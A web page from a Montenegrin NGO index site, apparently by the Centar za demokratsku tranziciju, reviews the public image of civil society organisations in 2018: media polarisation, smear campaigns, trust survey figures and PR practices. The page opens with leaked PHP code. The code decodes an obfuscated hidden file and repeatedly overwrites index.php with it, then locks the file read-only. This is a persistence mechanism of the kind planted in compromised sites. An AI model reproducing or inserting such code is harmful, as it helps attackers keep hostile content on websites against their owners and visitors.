$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Javni imidž-old | NVO Indeks

Javni imidž-old

Javni imidž OCDa blago je narušen u 2018. godini. Duboka podjela i polarizacija medija u Crnoj Gori utiče na medijsko izvještavanje o aktivnostima OCD-a. Mediji su duboko podijeljeni na provladine i antivladine, i izvještavaju selektivno u skladu s njihovim uređivačkim politikama. Osim toga, nivo medijske prisutnosti OCDa često diktiraju njihovi kapaciteti. 

Bilo je primjera negativnog medijskog izvještavanja o određenim aktivnostima OCDa u 2018. godini, kao i slučajeva medijske kampanje protiv pojedinaca iz civilnog sektora, uključujući incidente u kojima su desničarske stranke i grupacije dovodile u pitanje legitimitet nevladinih organizacija etiketirajući ih „izdajnicima“ ili „sorošoidima“. S druge strane, postoje i pozitivni primjeri saradnje koji se odražavaju kroz različita partnerstva između OCD-a i medija, uključujući organizovanje zajedničkih TV emisija ili određenih informativnih odjeljaka. Na primjer, mediji koriste istraživačke i druge proizvode NVOa kao relevantan izvor informacija. Takođe, predstavnici NVO sektora se redovno pojavljuju u medijima kao sagovornici za teme kojima se bave. 

Prema posljednjim istraživanjima javnog mnjenja, nivo povjerenja u NVO nije se značajno promijenio u 2018. Istraživanje koje je sproveo Centar za demokratiju i ljudska prava (CEDEM) pokazalo je da je povjerenje javnosti u nevladine organizacije u novembru 2017. iznosilo 43 %, a u decembru 2018. 41,2 %. 

Saradnja nevladinih organizacija i državnih organa najčešće zavisi od otvorenosti i volje rukovodstva tih organa. Poslovni sektor tretira organizacije civilnog društva kao važne aktere u razvoju zajednice i podržava brojne inicijative OCD-a, ali postoji značajan prostor za unapređenje te saradnje. 

Mali broj OCD-a ima strategiju odnosa sa javnošću. OCD većih kapaciteta uglavnom angažuju novinare ili agencije koje pružaju usluge u oblasti odnosa sa javnošću i produkcije. Dobro razvijene OCD izdvajaju dodatna sredstva za unapređenje komunikacije i promociju svojih aktivnosti u društvenim medijima. Nerijetko takve OCD imaju zaposlenog koji je zadužen za sprovođenje tih aktivnosti. Samoregulacija u sektoru je i dalje neznatna. Koalicija Zajedno do cilja ima etički kodeks, ali nije poznato koliko se široko on sprovodi.Zakon o nevladinim organizacijama propisuje da nevladine organizacije u svojim statutima utvrđuju način ostvarivanja javnosti svog rada. Veće organizacije na svojim internet stranicama objavljuju godišnje narativne i finansijske izvještaje s informacijama o svom radu, uključujući sprovedene projekte, aktivnosti, budžet i donatore. 

© 2020 Centar za demokratsku tranziciju